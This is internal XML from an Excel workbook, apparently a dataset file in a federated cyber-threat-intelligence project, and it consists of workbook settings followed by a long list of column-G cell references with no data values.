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defaultThemeVersion="166925"/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/hanwang/Documents/GitHub/Federated_AutoCTI/MISP_Functions/Distributed_FL/Client_A/Dataset/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{058D4A37-A22F-7249-84E7-CEBA4F3D645F}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="500" windowWidth="28800" windowHeight="16340" xr2:uid="{6D8E2F38-15CE-5344-BD9C-743F995F279A}"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">Sheet1!$A$1:$U$3763</definedName>
  </definedNames>
  <calcPr calcId="191029" iterateDelta="1E-4"/>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3768" i="1" l="1"/>
  <c r="G3767" i="1"/>
  <c r="G3766" i="1"/>
  <c r="G3765" i="1"/>
  <c r="G3764" i="1"/>
  <c r="G3763" i="1"/>
  <c r="G3762" i="1"/>
  <c r="G3761" i="1"/>
  <c r="G3760" i="1"/>
  <c r="G3759" i="1"/>
  <c r="G3758" i="1"/>
  <c r="G3757" i="1"/>
  <c r="G3756" i="1"/>
  <c r="G3755" i="1"/>
  <c r="G3754" i="1"/>
  <c r="G3753" i="1"/>
  <c r="G3752" i="1"/>
  <c r="G3751" i="1"/>
  <c r="G3750" i="1"/>
  <c r="G3749" i="1"/>
  <c r="G3748" i="1"/>
  <c r="G3747" i="1"/>
  <c r="G3746" i="1"/>
  <c r="G3745" i="1"/>
  <c r="G3744" i="1"/>
  <c r="G3743" i="1"/>
  <c r="G3742" i="1"/>
  <c r="G3741" i="1"/>
  <c r="G3740" i="1"/>
  <c r="G3739" i="1"/>
  <c r="G3738" i="1"/>
  <c r="G3737" i="1"/>
  <c r="G3736" i="1"/>
  <c r="G3735" i="1"/>
  <c r="G3734" i="1"/>
  <c r="G3733" i="1"/>
  <c r="G3732" i="1"/>
  <c r="G3731" i="1"/>
  <c r="G3730" i="1"/>
  <c r="G3729" i="1"/>
  <c r="G3728" i="1"/>
  <c r="G3727" i="1"/>
  <c r="G3726" i="1"/>
  <c r="G3725" i="1"/>
  <c r="G3724" i="1"/>
  <c r="G3723" i="1"/>
  <c r="G3722" i="1"/>
  <c r="G3721" i="1"/>
  <c r="G3720" i="1"/>
  <c r="G3719" i="1"/>
  <c r="G3718" i="1"/>
  <c r="G3717" i="1"/>
  <c r="G3716" i="1"/>
  <c r="G3715" i="1"/>
  <c r="G3714" i="1"/>
  <c r="G3713" i="1"/>
  <c r="G3712" i="1"/>
  <c r="G3711" i="1"/>
  <c r="G3710" i="1"/>
  <c r="G3709" i="1"/>
  <c r="G3708" i="1"/>
  <c r="G3707" i="1"/>
  <c r="G3706" i="1"/>
  <c r="G3705" i="1"/>
  <c r="G3704" i="1"/>
  <c r="G3703" i="1"/>
  <c r="G3702" i="1"/>
  <c r="G3701" i="1"/>
  <c r="G3700" i="1"/>
  <c r="G3699" i="1"/>
  <c r="G3698" i="1"/>
  <c r="G3697" i="1"/>
  <c r="G3696" i="1"/>
  <c r="G3695" i="1"/>
  <c r="G3694" i="1"/>
  <c r="G3693" i="1"/>
  <c r="G3692" i="1"/>
  <c r="G3691" i="1"/>
  <c r="G3690" i="1"/>
  <c r="G3689" i="1"/>
  <c r="G3688" i="1"/>
  <c r="G3687" i="1"/>
  <c r="G3686" i="1"/>
  <c r="G3685" i="1"/>
  <c r="G3684" i="1"/>
  <c r="G3683" i="1"/>
  <c r="G3682" i="1"/>
  <c r="G3681" i="1"/>
  <c r="G3680" i="1"/>
  <c r="G3679" i="1"/>
  <c r="G3678" i="1"/>
  <c r="G3677" i="1"/>
  <c r="G3676" i="1"/>
  <c r="G3675" i="1"/>
  <c r="G3674" i="1"/>
  <c r="G3673" i="1"/>
  <c r="G3672" i="1"/>
  <c r="G3671" i="1"/>
  <c r="G3670" i="1"/>
  <c r="G3669" i="1"/>
  <c r="G3668" i="1"/>
  <c r="G3667" i="1"/>
  <c r="G3666" i="1"/>
  <c r="G3665" i="1"/>
  <c r="G3664" i="1"/>
  <c r="G3663" i="1"/>
  <c r="G3662" i="1"/>
  <c r="G3661" i="1"/>
  <c r="G3660" i="1"/>
  <c r="G3659" i="1"/>
  <c r="G3658" i="1"/>
  <c r="G3657" i="1"/>
  <c r="G3656" i="1"/>
  <c r="G3655" i="1"/>
  <c r="G3654" i="1"/>
  <c r="G3653" i="1"/>
  <c r="G3652" i="1"/>
  <c r="G3651" i="1"/>
  <c r="G3650" i="1"/>
  <c r="G3649" i="1"/>
  <c r="G3648" i="1"/>
  <c r="G3647" i="1"/>
  <c r="G3646" i="1"/>
  <c r="G3645" i="1"/>
  <c r="G3644" i="1"/>
  <c r="G3643" i="1"/>
  <c r="G3642" i="1"/>
  <c r="G3641" i="1"/>
  <c r="G3640" i="1"/>
  <c r="G3639" i="1"/>
  <c r="G3638" i="1"/>
  <c r="G3637" i="1"/>
  <c r="G3636" i="1"/>
  <c r="G3635" i="1"/>
  <c r="G3634" i="1"/>
  <c r="G3633" i="1"/>
  <c r="G3632" i="1"/>
  <c r="G3631" i="1"/>
  <c r="G3630" i="1"/>
  <c r="G3629" i="1"/>
  <c r="G3628" i="1"/>
  <c r="G3627" i="1"/>
  <c r="G3626" i="1"/>
  <c r="G3625" i="1"/>
  <c r="G3624" i="1"/>
  <c r="G3623" i="1"/>
  <c r="G3622" i="1"/>
  <c r="G3621" i="1"/>
  <c r="G3620" i="1"/>
  <c r="G3619" i="1"/>
  <c r="G3618" i="1"/>
  <c r="G3617" i="1"/>
  <c r="G3616" i="1"/>
  <c r="G3615" i="1"/>
  <c r="G3614" i="1"/>
  <c r="G3613" i="1"/>
  <c r="G3612" i="1"/>
  <c r="G3611" i="1"/>
  <c r="G3610" i="1"/>
  <c r="G3609" i="1"/>
  <c r="G3608" i="1"/>
  <c r="G3607" i="1"/>
  <c r="G3606" i="1"/>
  <c r="G3605" i="1"/>
  <c r="G3604" i="1"/>
  <c r="G3603" i="1"/>
  <c r="G3602" i="1"/>
  <c r="G3601" i="1"/>
  <c r="G3600" i="1"/>
  <c r="G3599" i="1"/>
  <c r="G3598" i="1"/>
  <c r="G3597" i="1"/>
  <c r="G3596" i="1"/>
  <c r="G3595" i="1"/>
  <c r="G3594" i="1"/>
  <c r="G3593" i="1"/>
  <c r="G3592" i="1"/>
  <c r="G3591" i="1"/>
  <c r="G3590" i="1"/>
  <c r="G3589" i="1"/>
  <c r="G3588" i="1"/>
  <c r="G3587" i="1"/>
  <c r="G3586" i="1"/>
  <c r="G3585" i="1"/>
  <c r="G3584" i="1"/>
  <c r="G3583" i="1"/>
  <c r="G3582" i="1"/>
  <c r="G3581" i="1"/>
  <c r="G3580" i="1"/>
  <c r="G3579" i="1"/>
  <c r="G3578" i="1"/>
  <c r="G3577" i="1"/>
  <c r="G3576" i="1"/>
  <c r="G3575" i="1"/>
  <c r="G3574" i="1"/>
  <c r="G3573" i="1"/>
  <c r="G3572" i="1"/>
  <c r="G3571" i="1"/>
  <c r="G3570" i="1"/>
  <c r="G3569" i="1"/>
  <c r="G3568" i="1"/>
  <c r="G3567" i="1"/>
  <c r="G3566" i="1"/>
  <c r="G3565" i="1"/>
  <c r="G3564" i="1"/>
  <c r="G3563" i="1"/>
  <c r="G3562" i="1"/>
  <c r="G3561" i="1"/>
  <c r="G3560" i="1"/>
  <c r="G3559" i="1"/>
  <c r="G3558" i="1"/>
  <c r="G3557" i="1"/>
  <c r="G3556" i="1"/>
  <c r="G3555" i="1"/>
  <c r="G3554" i="1"/>
  <c r="G3553" i="1"/>
  <c r="G3552" i="1"/>
  <c r="G3551" i="1"/>
  <c r="G3550" i="1"/>
  <c r="G3549" i="1"/>
  <c r="G3548" i="1"/>
  <c r="G3547" i="1"/>
  <c r="G3546" i="1"/>
  <c r="G3545" i="1"/>
  <c r="G3544" i="1"/>
  <c r="G3543" i="1"/>
  <c r="G3542" i="1"/>
  <c r="G3541" i="1"/>
  <c r="G3540" i="1"/>
  <c r="G3539" i="1"/>
  <c r="G3538" i="1"/>
  <c r="G3537" i="1"/>
  <c r="G3536" i="1"/>
  <c r="G3535" i="1"/>
  <c r="G3534" i="1"/>
  <c r="G3533" i="1"/>
  <c r="G3532" i="1"/>
  <c r="G3531" i="1"/>
  <c r="G3530" i="1"/>
  <c r="G3529" i="1"/>
  <c r="G3528" i="1"/>
  <c r="G3527" i="1"/>
  <c r="G3526" i="1"/>
  <c r="G3525" i="1"/>
  <c r="G3524" i="1"/>
  <c r="G3523" i="1"/>
  <c r="G3522" i="1"/>
  <c r="G3521" i="1"/>
  <c r="G3520" i="1"/>
  <c r="G3519" i="1"/>
  <c r="G3518" i="1"/>
  <c r="G3517" i="1"/>
  <c r="G3516" i="1"/>
  <c r="G3515" i="1"/>
  <c r="G3514" i="1"/>
  <c r="G3513" i="1"/>
  <c r="G3512" i="1"/>
  <c r="G3511" i="1"/>
  <c r="G3510" i="1"/>
  <c r="G3509" i="1"/>
  <c r="G3508" i="1"/>
  <c r="G3507" i="1"/>
  <c r="G3506" i="1"/>
  <c r="G3505" i="1"/>
  <c r="G3504" i="1"/>
  <c r="G3503" i="1"/>
  <c r="G3502" i="1"/>
  <c r="G3501" i="1"/>
  <c r="G3500" i="1"/>
  <c r="G3499" i="1"/>
  <c r="G3498" i="1"/>
  <c r="G3497" i="1"/>
  <c r="G3496" i="1"/>
  <c r="G3495" i="1"/>
  <c r="G3494" i="1"/>
  <c r="G3493" i="1"/>
  <c r="G3492" i="1"/>
  <c r="G3491" i="1"/>
  <c r="G3490" i="1"/>
  <c r="G3489" i="1"/>
  <c r="G3488" i="1"/>
  <c r="G3487" i="1"/>
  <c r="G3486" i="1"/>
  <c r="G3485" i="1"/>
  <c r="G3484" i="1"/>
  <c r="G3483" i="1"/>
  <c r="G3482" i="1"/>
  <c r="G3481" i="1"/>
  <c r="G3480" i="1"/>
  <c r="G3479" i="1"/>
  <c r="G3478" i="1"/>
  <c r="G3477" i="1"/>
  <c r="G3476" i="1"/>
  <c r="G3475" i="1"/>
  <c r="G3474" i="1"/>
  <c r="G3473" i="1"/>
  <c r="G3472" i="1"/>
  <c r="G3471" i="1"/>
  <c r="G3470" i="1"/>
  <c r="G3469" i="1"/>
  <c r="G3468" i="1"/>
  <c r="G3467" i="1"/>
  <c r="G3466" i="1"/>
  <c r="G3465" i="1"/>
  <c r="G3464" i="1"/>
  <c r="G3463" i="1"/>
  <c r="G3462" i="1"/>
  <c r="G3461" i="1"/>
  <c r="G3460" i="1"/>
  <c r="G3459" i="1"/>
  <c r="G3458" i="1"/>
  <c r="G3457" i="1"/>
  <c r="G3456" i="1"/>
  <c r="G3455" i="1"/>
  <c r="G3454" i="1"/>
  <c r="G3453" i="1"/>
  <c r="G3452" i="1"/>
  <c r="G3451" i="1"/>
  <c r="G3450" i="1"/>
  <c r="G3449" i="1"/>
  <c r="G3448" i="1"/>
  <c r="G3447" i="1"/>
  <c r="G3446" i="1"/>
  <c r="G3445" i="1"/>
  <c r="G3444" i="1"/>
  <c r="G3443" i="1"/>
  <c r="G3442" i="1"/>
  <c r="G3441" i="1"/>
  <c r="G3440" i="1"/>
  <c r="G3439" i="1"/>
  <c r="G3438" i="1"/>
  <c r="G3437" i="1"/>
  <c r="G3436" i="1"/>
  <c r="G3435" i="1"/>
  <c r="G3434" i="1"/>
  <c r="G3433" i="1"/>
  <c r="G3432" i="1"/>
  <c r="G3431" i="1"/>
  <c r="G3430" i="1"/>
  <c r="G3429" i="1"/>
  <c r="G3428" i="1"/>
  <c r="G3427" i="1"/>
  <c r="G3426" i="1"/>
  <c r="G3425" i="1"/>
  <c r="G3424" i="1"/>
  <c r="G3423" i="1"/>
  <c r="G3422" i="1"/>
  <c r="G3421" i="1"/>
  <c r="G3420" i="1"/>
  <c r="G3419" i="1"/>
  <c r="G3418" i="1"/>
  <c r="G3417" i="1"/>
  <c r="G3416" i="1"/>
  <c r="G3415" i="1"/>
  <c r="G3414" i="1"/>
  <c r="G3413" i="1"/>
  <c r="G3412" i="1"/>
  <c r="G3411" i="1"/>
  <c r="G3410" i="1"/>
  <c r="G3409" i="1"/>
  <c r="G3408" i="1"/>
  <c r="G3407" i="1"/>
  <c r="G3406" i="1"/>
  <c r="G3405" i="1"/>
  <c r="G3404" i="1"/>
  <c r="G3403" i="1"/>
  <c r="G3402" i="1"/>
  <c r="G3401" i="1"/>
  <c r="G3400" i="1"/>
  <c r="G3399" i="1"/>
  <c r="G3398" i="1"/>
  <c r="G3397" i="1"/>
  <c r="G3396" i="1"/>
  <c r="G3395" i="1"/>
  <c r="G3394" i="1"/>
  <c r="G3393" i="1"/>
  <c r="G3392" i="1"/>
  <c r="G3391" i="1"/>
  <c r="G3390" i="1"/>
  <c r="G3389" i="1"/>
  <c r="G3388" i="1"/>
  <c r="G3387" i="1"/>
  <c r="G3386" i="1"/>
  <c r="G3385" i="1"/>
  <c r="G3384" i="1"/>
  <c r="G3383" i="1"/>
  <c r="G3382" i="1"/>
  <c r="G3381" i="1"/>
  <c r="G3380" i="1"/>
  <c r="G3379" i="1"/>
  <c r="G3378" i="1"/>
  <c r="G3377" i="1"/>
  <c r="G3376" i="1"/>
  <c r="G3375" i="1"/>
  <c r="G3374" i="1"/>
  <c r="G3373" i="1"/>
  <c r="G3372" i="1"/>
  <c r="G3371" i="1"/>
  <c r="G3370" i="1"/>
  <c r="G3369" i="1"/>
  <c r="G3368" i="1"/>
  <c r="G3367" i="1"/>
  <c r="G3366" i="1"/>
  <c r="G3365" i="1"/>
  <c r="G3364" i="1"/>
  <c r="G3363" i="1"/>
  <c r="G3362" i="1"/>
  <c r="G3361" i="1"/>
  <c r="G3360" i="1"/>
  <c r="G3359" i="1"/>
  <c r="G3358" i="1"/>
  <c r="G3357" i="1"/>
  <c r="G3356" i="1"/>
  <c r="G3355" i="1"/>
  <c r="G3354" i="1"/>
  <c r="G3353" i="1"/>
  <c r="G3352" i="1"/>
  <c r="G3351" i="1"/>
  <c r="G3350" i="1"/>
  <c r="G3349" i="1"/>
  <c r="G3348" i="1"/>
  <c r="G3347" i="1"/>
  <c r="G3346" i="1"/>
  <c r="G3345" i="1"/>
  <c r="G3344" i="1"/>
  <c r="G3343" i="1"/>
  <c r="G3342" i="1"/>
  <c r="G3341" i="1"/>
  <c r="G3340" i="1"/>
  <c r="G3339" i="1"/>
  <c r="G3338" i="1"/>
  <c r="G3337" i="1"/>
  <c r="G3336" i="1"/>
  <c r="G3335" i="1"/>
  <c r="G3334" i="1"/>
  <c r="G3333" i="1"/>
  <c r="G3332" i="1"/>
  <c r="G3331" i="1"/>
  <c r="G3330" i="1"/>
  <c r="G3329" i="1"/>
  <c r="G3328" i="1"/>
  <c r="G3327" i="1"/>
  <c r="G3326" i="1"/>
  <c r="G3325" i="1"/>
  <c r="G3324" i="1"/>
  <c r="G3323" i="1"/>
  <c r="G3322" i="1"/>
  <c r="G3321" i="1"/>
  <c r="G3320" i="1"/>
  <c r="G3319" i="1"/>
  <c r="G3318" i="1"/>
  <c r="G3317" i="1"/>
  <c r="G3316" i="1"/>
  <c r="G3315" i="1"/>
  <c r="G3314" i="1"/>
  <c r="G3313" i="1"/>
  <c r="G3312" i="1"/>
  <c r="G3311" i="1"/>
  <c r="G3310" i="1"/>
  <c r="G3309" i="1"/>
  <c r="G3308" i="1"/>
  <c r="G3307" i="1"/>
  <c r="G3306" i="1"/>
  <c r="G3305" i="1"/>
  <c r="G3304" i="1"/>
  <c r="G3303" i="1"/>
  <c r="G3302" i="1"/>
  <c r="G3301" i="1"/>
  <c r="G3300" i="1"/>
  <c r="G3299" i="1"/>
  <c r="G3298" i="1"/>
  <c r="G3297" i="1"/>
  <c r="G3296" i="1"/>
  <c r="G3295" i="1"/>
  <c r="G3294" i="1"/>
  <c r="G3293" i="1"/>
  <c r="G3292" i="1"/>
  <c r="G3291" i="1"/>
  <c r="G3290" i="1"/>
  <c r="G3289" i="1"/>
  <c r="G3288" i="1"/>
  <c r="G3287" i="1"/>
  <c r="G3286" i="1"/>
  <c r="G3285" i="1"/>
  <c r="G3284" i="1"/>
  <c r="G3283" i="1"/>
  <c r="G3282" i="1"/>
  <c r="G3281" i="1"/>
  <c r="G3280" i="1"/>
  <c r="G3279" i="1"/>
  <c r="G3278" i="1"/>
  <c r="G3277" i="1"/>
  <c r="G3276" i="1"/>
  <c r="G3275" i="1"/>
  <c r="G3274" i="1"/>
  <c r="G3273" i="1"/>
  <c r="G3272" i="1"/>
  <c r="G3271" i="1"/>
  <c r="G3270" i="1"/>
  <c r="G3269" i="1"/>
  <c r="G3268" i="1"/>
  <c r="G3267" i="1"/>
  <c r="G3266" i="1"/>
  <c r="G3265" i="1"/>
  <c r="G3264" i="1"/>
  <c r="G3263" i="1"/>
  <c r="G3262" i="1"/>
  <c r="G3261" i="1"/>
  <c r="G3260" i="1"/>
  <c r="G3259" i="1"/>
  <c r="G3258" i="1"/>
  <c r="G3257" i="1"/>
  <c r="G3256" i="1"/>
  <c r="G3255" i="1"/>
  <c r="G3254" i="1"/>
  <c r="G3253" i="1"/>
  <c r="G3252" i="1"/>
  <c r="G3251" i="1"/>
  <c r="G3250" i="1"/>
  <c r="G3249" i="1"/>
  <c r="G3248" i="1"/>
  <c r="G3247" i="1"/>
  <c r="G3246" i="1"/>
  <c r="G3245" i="1"/>
  <c r="G3244" i="1"/>
  <c r="G3243" i="1"/>
  <c r="G3242" i="1"/>
  <c r="G3241" i="1"/>
  <c r="G3240" i="1"/>
  <c r="G3239" i="1"/>
  <c r="G3238" i="1"/>
  <c r="G3237" i="1"/>
  <c r="G3236" i="1"/>
  <c r="G3235" i="1"/>
  <c r="G3234" i="1"/>
  <c r="G3233" i="1"/>
  <c r="G3232" i="1"/>
  <c r="G3231" i="1"/>
  <c r="G3230" i="1"/>
  <c r="G3229" i="1"/>
  <c r="G3228" i="1"/>
  <c r="G3227" i="1"/>
  <c r="G3226" i="1"/>
  <c r="G3225" i="1"/>
  <c r="G3224" i="1"/>
  <c r="G3223" i="1"/>
  <c r="G3222" i="1"/>
  <c r="G3221" i="1"/>
  <c r="G3220" i="1"/>
  <c r="G3219" i="1"/>
  <c r="G3218" i="1"/>
  <c r="G3217" i="1"/>
  <c r="G3216" i="1"/>
  <c r="G3215" i="1"/>
  <c r="G3214" i="1"/>
  <c r="G3213" i="1"/>
  <c r="G3212" i="1"/>
  <c r="G3211" i="1"/>
  <c r="G3210" i="1"/>
  <c r="G3209" i="1"/>
  <c r="G3208" i="1"/>
  <c r="G3207" i="1"/>
  <c r="G3206" i="1"/>
  <c r="G3205" i="1"/>
  <c r="G3204" i="1"/>
  <c r="G3203" i="1"/>
  <c r="G3202" i="1"/>
  <c r="G3201" i="1"/>
  <c r="G3200" i="1"/>
  <c r="G3199" i="1"/>
  <c r="G3198" i="1"/>
  <c r="G3197" i="1"/>
  <c r="G3196" i="1"/>
  <c r="G3195" i="1"/>
  <c r="G3194" i="1"/>
  <c r="G3193" i="1"/>
  <c r="G3192" i="1"/>
  <c r="G3191" i="1"/>
  <c r="G3190" i="1"/>
  <c r="G3189" i="1"/>
  <c r="G3188" i="1"/>
  <c r="G3187" i="1"/>
  <c r="G3186" i="1"/>
  <c r="G3185" i="1"/>
  <c r="G3184" i="1"/>
  <c r="G3183" i="1"/>
  <c r="G3182" i="1"/>
  <c r="G3181" i="1"/>
  <c r="G3180" i="1"/>
  <c r="G3179" i="1"/>
  <c r="G3178" i="1"/>
  <c r="G3177" i="1"/>
  <c r="G3176" i="1"/>
  <c r="G3175" i="1"/>
  <c r="G3174" i="1"/>
  <c r="G3173" i="1"/>
  <c r="G3172" i="1"/>
  <c r="G3171" i="1"/>
  <c r="G3170" i="1"/>
  <c r="G3169" i="1"/>
  <c r="G3168" i="1"/>
  <c r="G3167" i="1"/>
  <c r="G3166" i="1"/>
  <c r="G3165" i="1"/>
  <c r="G3164" i="1"/>
  <c r="G3163" i="1"/>
  <c r="G3162" i="1"/>
  <c r="G3161" i="1"/>
  <c r="G3160" i="1"/>
  <c r="G3159" i="1"/>
  <c r="G3158" i="1"/>
  <c r="G3157" i="1"/>
  <c r="G3156" i="1"/>
  <c r="G3155" i="1"/>
  <c r="G3154" i="1"/>
  <c r="G3153" i="1"/>
  <c r="G3152" i="1"/>
  <c r="G3151" i="1"/>
  <c r="G3150" i="1"/>
  <c r="G3149" i="1"/>
  <c r="G3148" i="1"/>
  <c r="G3147" i="1"/>
  <c r="G3146" i="1"/>
  <c r="G3145" i="1"/>
  <c r="G3144" i="1"/>
  <c r="G3143" i="1"/>
  <c r="G3142" i="1"/>
  <c r="G3141" i="1"/>
  <c r="G3140" i="1"/>
  <c r="G3139" i="1"/>
  <c r="G3138" i="1"/>
  <c r="G3137" i="1"/>
  <c r="G3136" i="1"/>
  <c r="G3135" i="1"/>
  <c r="G3134" i="1"/>
  <c r="G3133" i="1"/>
  <c r="G3132" i="1"/>
  <c r="G3131" i="1"/>
  <c r="G3130" i="1"/>
  <c r="G3129" i="1"/>
  <c r="G3128" i="1"/>
  <c r="G3127" i="1"/>
  <c r="G3126" i="1"/>
  <c r="G3125" i="1"/>
  <c r="G3124" i="1"/>
  <c r="G3123" i="1"/>
  <c r="G3122" i="1"/>
  <c r="G3121" i="1"/>
  <c r="G3120" i="1"/>
  <c r="G3119" i="1"/>
  <c r="G3118" i="1"/>
  <c r="G3117" i="1"/>
  <c r="G3116" i="1"/>
  <c r="G3115" i="1"/>
  <c r="G3114" i="1"/>
  <c r="G3113" i="1"/>
  <c r="G3112" i="1"/>
  <c r="G3111" i="1"/>
  <c r="G3110" i="1"/>
  <c r="G3109" i="1"/>
  <c r="G3108" i="1"/>
  <c r="G3107" i="1"/>
  <c r="G3106" i="1"/>
  <c r="G3105" i="1"/>
  <c r="G3104" i="1"/>
  <c r="G3103" i="1"/>
  <c r="G3102" i="1"/>
  <c r="G3101" i="1"/>
  <c r="G3100" i="1"/>
  <c r="G3099" i="1"/>
  <c r="G3098" i="1"/>
  <c r="G3097" i="1"/>
  <c r="G3096" i="1"/>
  <c r="G3095" i="1"/>
  <c r="G3094" i="1"/>
  <c r="G3093" i="1"/>
  <c r="G3092" i="1"/>
  <c r="G3091" i="1"/>
  <c r="G3090" i="1"/>
  <c r="G3089" i="1"/>
  <c r="G3088" i="1"/>
  <c r="G3087" i="1"/>
  <c r="G3086" i="1"/>
  <c r="G3085" i="1"/>
  <c r="G3084" i="1"/>
  <c r="G3083" i="1"/>
  <c r="G3082" i="1"/>
  <c r="G3081" i="1"/>
  <c r="G3080" i="1"/>
  <c r="G3079" i="1"/>
  <c r="G3078" i="1"/>
  <c r="G3077" i="1"/>
  <c r="G3076" i="1"/>
  <c r="G3075" i="1"/>
  <c r="G3074" i="1"/>
  <c r="G3073" i="1"/>
  <c r="G3072" i="1"/>
  <c r="G3071" i="1"/>
  <c r="G3070" i="1"/>
  <c r="G3069" i="1"/>
  <c r="G3068" i="1"/>
  <c r="G3067" i="1"/>
  <c r="G3066" i="1"/>
  <c r="G3065" i="1"/>
  <c r="G3064" i="1"/>
  <c r="G3063" i="1"/>
  <c r="G3062" i="1"/>
  <c r="G3061" i="1"/>
  <c r="G3060" i="1"/>
  <c r="G3059" i="1"/>
  <c r="G3058" i="1"/>
  <c r="G3057" i="1"/>
  <c r="G3056" i="1"/>
  <c r="G3055" i="1"/>
  <c r="G3054" i="1"/>
  <c r="G3053" i="1"/>
  <c r="G3052" i="1"/>
  <c r="G3051" i="1"/>
  <c r="G3050" i="1"/>
  <c r="G3049" i="1"/>
  <c r="G3048" i="1"/>
  <c r="G3047" i="1"/>
  <c r="G3046" i="1"/>
  <c r="G3045" i="1"/>
  <c r="G3044" i="1"/>
  <c r="G3043" i="1"/>
  <c r="G3042" i="1"/>
  <c r="G3041" i="1"/>
  <c r="G3040" i="1"/>
  <c r="G3039" i="1"/>
  <c r="G3038" i="1"/>
  <c r="G3037" i="1"/>
  <c r="G3036" i="1"/>
  <c r="G3035" i="1"/>
  <c r="G3034" i="1"/>
  <c r="G3033" i="1"/>
  <c r="G3032" i="1"/>
  <c r="G3031" i="1"/>
  <c r="G3030" i="1"/>
  <c r="G3029" i="1"/>
  <c r="G3028" i="1"/>
  <c r="G3027" i="1"/>
  <c r="G3026" i="1"/>
  <c r="G3025" i="1"/>
  <c r="G3024" i="1"/>
  <c r="G3023" i="1"/>
  <c r="G3022" i="1"/>
  <c r="G3021" i="1"/>
  <c r="G3020" i="1"/>
  <c r="G3019" i="1"/>
  <c r="G3018" i="1"/>
  <c r="G3017" i="1"/>
  <c r="G3016" i="1"/>
  <c r="G3015" i="1"/>
  <c r="G3014" i="1"/>
  <c r="G3013" i="1"/>
  <c r="G3012" i="1"/>
  <c r="G3011" i="1"/>
  <c r="G3010" i="1"/>
  <c r="G3009" i="1"/>
  <c r="G3008" i="1"/>
  <c r="G3007" i="1"/>
  <c r="G3006" i="1"/>
  <c r="G3005" i="1"/>
  <c r="G3004" i="1"/>
  <c r="G3003" i="1"/>
  <c r="G3002" i="1"/>
  <c r="G3001" i="1"/>
  <c r="G3000" i="1"/>
  <c r="G2999" i="1"/>
  <c r="G2998" i="1"/>
  <c r="G2997" i="1"/>
  <c r="G2996" i="1"/>
  <c r="G2995" i="1"/>
  <c r="G2994" i="1"/>
  <c r="G2993" i="1"/>
  <c r="G2992" i="1"/>
  <c r="G2991" i="1"/>
  <c r="G2990" i="1"/>
  <c r="G2989" i="1"/>
  <c r="G2988" i="1"/>
  <c r="G2987" i="1"/>
  <c r="G2986" i="1"/>
  <c r="G2985" i="1"/>
  <c r="G2984" i="1"/>
  <c r="G2983" i="1"/>
  <c r="G2982" i="1"/>
  <c r="G2981" i="1"/>
  <c r="G2980" i="1"/>
  <c r="G2979" i="1"/>
  <c r="G2978" i="1"/>
  <c r="G2977" i="1"/>
  <c r="G2976" i="1"/>
  <c r="G2975" i="1"/>
  <c r="G2974" i="1"/>
  <c r="G2973" i="1"/>
  <c r="G2972" i="1"/>
  <c r="G2971" i="1"/>
  <c r="G2970" i="1"/>
  <c r="G2969" i="1"/>
  <c r="G2968" i="1"/>
  <c r="G2967" i="1"/>
  <c r="G2966" i="1"/>
  <c r="G2965" i="1"/>
  <c r="G2964" i="1"/>
  <c r="G2963" i="1"/>
  <c r="G2962" i="1"/>
  <c r="G2961" i="1"/>
  <c r="G2960" i="1"/>
  <c r="G2959" i="1"/>
  <c r="G2958" i="1"/>
  <c r="G2957" i="1"/>
  <c r="G2956" i="1"/>
  <c r="G2955" i="1"/>
  <c r="G2954" i="1"/>
  <c r="G2953" i="1"/>
  <c r="G2952" i="1"/>
  <c r="G2951" i="1"/>
  <c r="G2950" i="1"/>
  <c r="G2949" i="1"/>
  <c r="G2948" i="1"/>
  <c r="G2947" i="1"/>
  <c r="G2946" i="1"/>
  <c r="G2945" i="1"/>
  <c r="G2944" i="1"/>
  <c r="G2943" i="1"/>
  <c r="G2942" i="1"/>
  <c r="G2941" i="1"/>
  <c r="G2940" i="1"/>
  <c r="G2939" i="1"/>
  <c r="G2938" i="1"/>
  <c r="G2937" i="1"/>
  <c r="G2936" i="1"/>
  <c r="G2935" i="1"/>
  <c r="G2934" i="1"/>
  <c r="G2933" i="1"/>
  <c r="G2932" i="1"/>
  <c r="G2931" i="1"/>
  <c r="G2930" i="1"/>
  <c r="G2929" i="1"/>
  <c r="G2928" i="1"/>
  <c r="G2927" i="1"/>
  <c r="G2926" i="1"/>
  <c r="G2925" i="1"/>
  <c r="G2924" i="1"/>
  <c r="G2923" i="1"/>
  <c r="G2922" i="1"/>
  <c r="G2921" i="1"/>
  <c r="G2920" i="1"/>
  <c r="G2919" i="1"/>
  <c r="G2918" i="1"/>
  <c r="G2917" i="1"/>
  <c r="G2916" i="1"/>
  <c r="G2915" i="1"/>
  <c r="G2914" i="1"/>
  <c r="G2913" i="1"/>
  <c r="G2912" i="1"/>
  <c r="G2911" i="1"/>
  <c r="G2910" i="1"/>
  <c r="G2909" i="1"/>
  <c r="G2908" i="1"/>
  <c r="G2907" i="1"/>
  <c r="G2906" i="1"/>
  <c r="G2905" i="1"/>
  <c r="G2904" i="1"/>
  <c r="G2903" i="1"/>
  <c r="G2902" i="1"/>
  <c r="G2901" i="1"/>
  <c r="G2900" i="1"/>
  <c r="G2899" i="1"/>
  <c r="G2898" i="1"/>
  <c r="G2897" i="1"/>
  <c r="G2896" i="1"/>
  <c r="G2895" i="1"/>
  <c r="G2894" i="1"/>
  <c r="G2893" i="1"/>
  <c r="G2892" i="1"/>
  <c r="G2891" i="1"/>
  <c r="G2890" i="1"/>
  <c r="G2889" i="1"/>
  <c r="G2888" i="1"/>
  <c r="G2887" i="1"/>
  <c r="G2886" i="1"/>
  <c r="G2885" i="1"/>
  <c r="G2884" i="1"/>
  <c r="G2883" i="1"/>
  <c r="G2882" i="1"/>
  <c r="G2881" i="1"/>
  <c r="G2880" i="1"/>
  <c r="G2879" i="1"/>
  <c r="G2878" i="1"/>
  <c r="G2877" i="1"/>
  <c r="G2876" i="1"/>
  <c r="G2875" i="1"/>
  <c r="G2874" i="1"/>
  <c r="G2873" i="1"/>
  <c r="G2872" i="1"/>
  <c r="G2871" i="1"/>
  <c r="G2870" i="1"/>
  <c r="G2869" i="1"/>
  <c r="G2868" i="1"/>
